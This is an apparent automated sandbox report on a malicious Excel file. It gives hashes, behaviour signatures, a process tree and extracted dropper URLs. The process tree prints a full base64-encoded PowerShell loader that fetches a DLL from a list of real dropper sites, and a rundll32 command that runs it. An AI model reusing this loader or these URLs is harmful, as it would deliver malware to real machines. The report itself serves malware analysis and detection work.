Analysis

  • max time kernel
    93s
  • max time network
    35s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
  • submitted
    21-11-2022 11:53

General

  • Target

    b5f5d6de381bb2bd2f5f4520727a307c7f094435fa22fa05b840a3ce5b400c67.bin.xls

  • Size

    138KB

  • MD5

    430d7c853638524e59abe98c593b2ae5

  • SHA1

    6ed415997a658f5b749dded6347bf970acac2601

  • SHA256

    b5f5d6de381bb2bd2f5f4520727a307c7f094435fa22fa05b840a3ce5b400c67

  • SHA512

    e7100c0e17f4910305077018350c625d815115b09044764d037c98a9b847d48400c8fd7f0fb194617b96ca955f06f5b076e64887c33e89dcac7de08dbb93f40c

  • SSDEEP

    3072:zKehv7q2Pjx45uoDGTj+5xtekEvi8/dg0a3Wm47CdX5gVvhoxzYrasdJXIch1L:Wehv7q2Pjx45uoDGTj+5xtFEvi8/dg0x

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://midnightsilvercrafters.com/store/wBjNOUw/

exe.dropper

http://tempral.com/NATE_05_22_2009/BI710N4cQ6R3/

exe.dropper

https://redington.karmatechmediaworks.com/wp-content/3JVuVx7QUM/

exe.dropper

https://uhc.karmatechmediaworks.com/wp-content/0EqfdeznntlOpaIP2Qv/

exe.dropper

https://servilogic.net/b/14hqrdyP0Z3WsbQib8/

exe.dropper

https://comezmuhendislik.com/ljfrmm/VTpHRFWoORAHnRQ3aQL/

exe.dropper

http://webmail.glemedical.com/wp-content/J1M2xxodH/

exe.dropper

http://toto.karmatechmediaworks.com/wp-content/i826vbcVgRJ/

exe.dropper

https://golfpia.karmatechmediaworks.com/wp-content/oEicpDnEkk/

exe.dropper

https://fortiuspharma.com/y6krss/EGm347cqj5/

exe.dropper

https://garyjharris.com/cgi-bin/0hH/

exe.dropper

https://vietnam.karmatechmediaworks.com/wp-content/PfSVQagusZy7AaMw/

exe.dropper

https://vinculinc.karmatechmediaworks.com/wp-content/VlcOPPwgidWlXDJNs6/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\b5f5d6de381bb2bd2f5f4520727a307c7f094435fa22fa05b840a3ce5b400c67.bin.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1228
    • C:\Windows\SysWOW64\wscript.exe
      wscript c:\programdata\oue4hjld.vbs
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:532
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\programdata\bhnasleil.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1464
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -enc JABNAEoAWABkAGYAcwBoAEQAcgBmAEcAWgBzAGUAcwA0AD0AIgBoAHQAdABwADoALwAvAG0AaQBkAG4AaQBnAGgAdABzAGkAbAB2AGUAcgBjAHIAYQBmAHQAZQByAHMALgBjAG8AbQAvAHMAdABvAHIAZQAvAHcAQgBqAE4ATwBVAHcALwAsAGgAdAB0AHAAOgAvAC8AdABlAG0AcAByAGEAbAAuAGMAbwBtAC8ATgBBAFQARQBfADAANQBfADIAMgBfADIAMAAwADkALwBCAEkANwAxADAATgA0AGMAUQA2AFIAMwAvACwAaAB0AHQAcABzADoALwAvAHIAZQBkAGkAbgBnAHQAbwBuAC4AawBhAHIAbQBhAHQAZQBjAGgAbQBlAGQAaQBhAHcAbwByAGsAcwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvADMASgBWAHUAVgB4ADcAUQBVAE0ALwAsAGgAdAB0AHAAcwA6AC8ALwB1AGgAYwAuAGsAYQByAG0AYQB0AGUAYwBoAG0AZQBkAGkAYQB3AG8AcgBrAHMALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwAwAEUAcQBmAGQAZQB6AG4AbgB0AGwATwBwAGEASQBQADIAUQB2AC8ALABoAHQAdABwAHMAOgAvAC8AcwBlAHIAdgBpAGwAbwBnAGkAYwAuAG4AZQB0AC8AYgAvADEANABoAHEAcgBkAHkAUAAwAFoAMwBXAHMAYgBRAGkAYgA4AC8ALABoAHQAdABwAHMAOgAvAC8AYwBvAG0AZQB6AG0AdQBoAGUAbgBkAGkAcwBsAGkAawAuAGMAbwBtAC8AbABqAGYAcgBtAG0ALwBWAFQAcABIAFIARgBXAG8ATwBSAEEASABuAFIAUQAzAGEAUQBMAC8ALABoAHQAdABwADoALwAvAHcAZQBiAG0AYQBpAGwALgBnAGwAZQBtAGUAZABpAGMAYQBsAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8ASgAxAE0AMgB4AHgAbwBkAEgALwAsAGgAdAB0AHAAOgAvAC8AdABvAHQAbwAuAGsAYQByAG0AYQB0AGUAYwBoAG0AZQBkAGkAYQB3AG8AcgBrAHMALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBpADgAMgA2AHYAYgBjAFYAZwBSAEoALwAsAGgAdAB0AHAAcwA6AC8ALwBnAG8AbABmAHAAaQBhAC4AawBhAHIAbQBhAHQAZQBjAGgAbQBlAGQAaQBhAHcAbwByAGsAcwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAG8ARQBpAGMAcABEAG4ARQBrAGsALwAsAGgAdAB0AHAAcwA6AC8ALwBmAG8AcgB0AGkAdQBzAHAAaABhAHIAbQBhAC4AYwBvAG0ALwB5ADYAawByAHMAcwAvAEUARwBtADMANAA3AGMAcQBqADUALwAsAGgAdAB0AHAAcwA6AC8ALwBnAGEAcgB5AGoAaABhAHIAcgBpAHMALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwAwAGgASAAvACwAaAB0AHQAcABzADoALwAvAHYAaQBlAHQAbgBhAG0ALgBrAGEAcgBtAGEAdABlAGMAaABtAGUAZABpAGEAdwBvAHIAawBzAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AUABmAFMAVgBRAGEAZwB1AHMAWgB5ADcAQQBhAE0AdwAvACwAaAB0AHQAcABzADoALwAvAHYAaQBuAGMAdQBsAGkAbgBjAC4AawBhAHIAbQBhAHQAZQBjAGgAbQBlAGQAaQBhAHcAbwByAGsAcwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAFYAbABjAE8AUABQAHcAZwBpAGQAVwBsAFgARABKAE4AcwA2AC8AIgAuAHMAUABMAEkAdAAoACIALAAiACkAOwAgAGYAbwBSAGUAQQBDAGgAKAAkAHkASQBkAHMAUgBoAHkAZQAzADQAcwB5AHUAZgBnAHgAagBjAGQAZgAgAGkATgAgACQATQBKAFgAZABmAHMAaABEAHIAZgBHAFoAcwBlAHMANAApAHsAJABHAHcAZQBZAEgANQA3AHMAZQBkAHMAdwBkAD0AKAAiAGMAaQB1AHcAZAA6AGkAdQB3AGQAXABwAHIAaQB1AHcAZABvAGcAaQB1AHcAZAByAGEAbQBpAHUAdwBkAGQAYQB0AGkAdQB3AGQAYQBcAHYAeABjAGoAawBmAGgAZAAuAGQAaQB1AHcAZABsAGkAdQB3AGQAbAAiACkALgByAGUAUABsAEEAQwBlACgAIgBpAHUAdwBkACIALAAiACIAKQA7AGkAbgBWAE8AawBlAC0AdwBlAEIAcgBFAHEAVQBlAHMAVAAgAC0AdQBSAEkAIAAkAHkASQBkAHMAUgBoAHkAZQAzADQAcwB5AHUAZgBnAHgAagBjAGQAZgAgAC0AbwBVAHQARgBJAGwAZQAgACQARwB3AGUAWQBIADUANwBzAGUAZABzAHcAZAA7AGkARgAoAHQAZQBTAHQALQBwAEEAVABoACAAJABHAHcAZQBZAEgANQA3AHMAZQBkAHMAdwBkACkAewBpAGYAKAAoAGcARQB0AC0AaQB0AEUAbQAgACQARwB3AGUAWQBIADUANwBzAGUAZABzAHcAZAApAC4AbABlAE4ARwB0AGgAIAAtAGcAZQAgADQANwA0ADMANgApAHsAYgBSAGUAYQBrADsAfQB9AH0A
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2016
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c start /B c:\windows\syswow64\rundll32.exe c:\programdata\vxcjkfhd.dll,ganw4ls
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:704
        • \??\c:\windows\syswow64\rundll32.exe
          c:\windows\syswow64\rundll32.exe c:\programdata\vxcjkfhd.dll,ganw4ls
          4⤵
            PID:1976

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\programdata\bhnasleil.bat

      Filesize

      3KB

      MD5

      0f96848827a2960f874bcf613ce1e72c

      SHA1

      d936a765910adaf627fc6459716847fd87595ea2

      SHA256

      9e9915a1e009b7a9283629e5a1a66604915030b445c1f266914955299563473e

      SHA512

      00f04d42d544c0564ca4d435fbc0803ebcd8eabaa45abc852b449beffb4f3701681b8c908f580640e71686255c83aa698f10ea75a51dd0bf76c177132e86b862

    • \??\c:\programdata\oue4hjld.vbs

      Filesize

      604B

      MD5

      a0e5c8b0ad3da42bf6952871a41bf5e8

      SHA1

      cd2106ebaf43d596057457e87cf4c8482e246005

      SHA256

      5c3d66e2d33dfb51c691010af5d0a87250aa475235b537a336c607ade93a881a

      SHA512

      c685cc80c128087b6711ab65c7a0f2c63f55dfbab8577aea20d668112f77a0e69e7e350ff314201e93b8ef79f72764c79fc20e903c1a1f973e37ae3a873ff725

    • memory/532-122-0x0000000000000000-mapping.dmp

    • memory/704-131-0x0000000000000000-mapping.dmp

    • memory/1228-85-0x0000000000605000-0x0000000000609000-memory.dmp

      Filesize

      16KB

    • memory/1228-67-0x0000000000605000-0x0000000000609000-memory.dmp

      Filesize

      16KB

    • memory/1228-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1228-57-0x0000000071B7D000-0x0000000071B88000-memory.dmp

      Filesize

      44KB

    • memory/1228-58-0x0000000075E11000-0x0000000075E13000-memory.dmp

      Filesize

      8KB

    • memory/1228-59-0x00000000005FA000-0x0000000000605000-memory.dmp

      Filesize

      44KB

    • memory/1228-60-0x00000000005FA000-0x0000000000605000-memory.dmp

      Filesize

      44KB

    • memory/1228-87-0x00000000005FA000-0x0000000000605000-memory.dmp

      Filesize

      44KB

    • memory/1228-62-0x0000000000605000-0x0000000000609000-memory.dmp

      Filesize

      16KB

    • memory/1228-63-0x00000000005FA000-0x0000000000605000-memory.dmp

      Filesize

      44KB

    • memory/1228-64-0x00000000005FA000-0x0000000000605000-memory.dmp

      Filesize

      44KB

    • memory/1228-65-0x00000000005FA000-0x0000000000605000-memory.dmp

      Filesize

      44KB

    • memory/1228-66-0x0000000000605000-0x0000000000609000-memory.dmp

      Filesize

      16KB

    • memory/1228-88-0x00000000005FA000-0x0000000000605000-memory.dmp

      Filesize

      44KB

    • memory/1228-68-0x0000000000605000-0x0000000000609000-memory.dmp

      Filesize

      16KB

    • memory/1228-69-0x0000000000605000-0x0000000000609000-memory.dmp

      Filesize

      16KB

    • memory/1228-72-0x0000000000605000-0x0000000000609000-memory.dmp

      Filesize

      16KB

    • memory/1228-89-0x00000000005FA000-0x0000000000605000-memory.dmp

      Filesize

      44KB

    • memory/1228-71-0x0000000000605000-0x0000000000609000-memory.dmp

      Filesize

      16KB

    • memory/1228-70-0x0000000000605000-0x0000000000609000-memory.dmp

      Filesize

      16KB

    • memory/1228-76-0x0000000000605000-0x0000000000609000-memory.dmp

      Filesize

      16KB

    • memory/1228-75-0x0000000000605000-0x0000000000609000-memory.dmp

      Filesize

      16KB

    • memory/1228-74-0x0000000000605000-0x0000000000609000-memory.dmp

      Filesize

      16KB

    • memory/1228-77-0x0000000000605000-0x0000000000609000-memory.dmp

      Filesize

      16KB

    • memory/1228-79-0x0000000000605000-0x0000000000609000-memory.dmp

      Filesize

      16KB

    • memory/1228-80-0x0000000000605000-0x0000000000609000-memory.dmp

      Filesize

      16KB

    • memory/1228-81-0x0000000000605000-0x0000000000609000-memory.dmp

      Filesize

      16KB

    • memory/1228-82-0x0000000000605000-0x0000000000609000-memory.dmp

      Filesize

      16KB

    • memory/1228-84-0x0000000000605000-0x0000000000609000-memory.dmp

      Filesize

      16KB

    • memory/1228-83-0x0000000000605000-0x0000000000609000-memory.dmp

      Filesize

      16KB

    • memory/1228-54-0x000000002FF91000-0x000000002FF94000-memory.dmp

      Filesize

      12KB

    • memory/1228-86-0x0000000000605000-0x0000000000609000-memory.dmp

      Filesize

      16KB

    • memory/1228-61-0x00000000005FA000-0x0000000000605000-memory.dmp

      Filesize

      44KB

    • memory/1228-55-0x0000000070B91000-0x0000000070B93000-memory.dmp

      Filesize

      8KB

    • memory/1228-73-0x0000000000605000-0x0000000000609000-memory.dmp

      Filesize

      16KB

    • memory/1228-90-0x0000000000605000-0x0000000000609000-memory.dmp

      Filesize

      16KB

    • memory/1228-91-0x0000000000605000-0x0000000000609000-memory.dmp

      Filesize

      16KB

    • memory/1228-94-0x0000000000605000-0x0000000000609000-memory.dmp

      Filesize

      16KB

    • memory/1228-93-0x0000000000605000-0x0000000000609000-memory.dmp

      Filesize

      16KB

    • memory/1228-95-0x0000000000605000-0x0000000000609000-memory.dmp

      Filesize

      16KB

    • memory/1228-97-0x0000000000605000-0x0000000000609000-memory.dmp

      Filesize

      16KB

    • memory/1228-96-0x0000000000605000-0x0000000000609000-memory.dmp

      Filesize

      16KB

    • memory/1228-100-0x0000000000605000-0x0000000000609000-memory.dmp

      Filesize

      16KB

    • memory/1228-99-0x0000000000605000-0x0000000000609000-memory.dmp

      Filesize

      16KB

    • memory/1228-98-0x0000000000605000-0x0000000000609000-memory.dmp

      Filesize

      16KB

    • memory/1228-101-0x0000000071B7D000-0x0000000071B88000-memory.dmp

      Filesize

      44KB

    • memory/1228-102-0x0000000000605000-0x0000000000609000-memory.dmp

      Filesize

      16KB

    • memory/1228-104-0x0000000000605000-0x0000000000609000-memory.dmp

      Filesize

      16KB

    • memory/1228-105-0x0000000000605000-0x0000000000609000-memory.dmp

      Filesize

      16KB

    • memory/1228-106-0x0000000000605000-0x0000000000609000-memory.dmp

      Filesize

      16KB

    • memory/1228-107-0x0000000000605000-0x0000000000609000-memory.dmp

      Filesize

      16KB

    • memory/1228-108-0x0000000000605000-0x0000000000609000-memory.dmp

      Filesize

      16KB

    • memory/1228-109-0x0000000000605000-0x0000000000609000-memory.dmp

      Filesize

      16KB

    • memory/1228-110-0x0000000000605000-0x0000000000609000-memory.dmp

      Filesize

      16KB

    • memory/1228-111-0x0000000000605000-0x0000000000609000-memory.dmp

      Filesize

      16KB

    • memory/1228-119-0x0000000000605000-0x0000000000609000-memory.dmp

      Filesize

      16KB

    • memory/1228-118-0x0000000000605000-0x0000000000609000-memory.dmp

      Filesize

      16KB

    • memory/1228-117-0x0000000000605000-0x0000000000609000-memory.dmp

      Filesize

      16KB

    • memory/1228-116-0x0000000000605000-0x0000000000609000-memory.dmp

      Filesize

      16KB

    • memory/1228-115-0x0000000000605000-0x0000000000609000-memory.dmp

      Filesize

      16KB

    • memory/1228-114-0x0000000000605000-0x0000000000609000-memory.dmp

      Filesize

      16KB

    • memory/1228-112-0x0000000000605000-0x0000000000609000-memory.dmp

      Filesize

      16KB

    • memory/1464-126-0x0000000000000000-mapping.dmp

    • memory/1976-132-0x0000000000000000-mapping.dmp

    • memory/2016-127-0x0000000000000000-mapping.dmp

    • memory/2016-129-0x000000006B340000-0x000000006B8EB000-memory.dmp

      Filesize

      5.7MB

    • memory/2016-130-0x000000006B340000-0x000000006B8EB000-memory.dmp

      Filesize

      5.7MB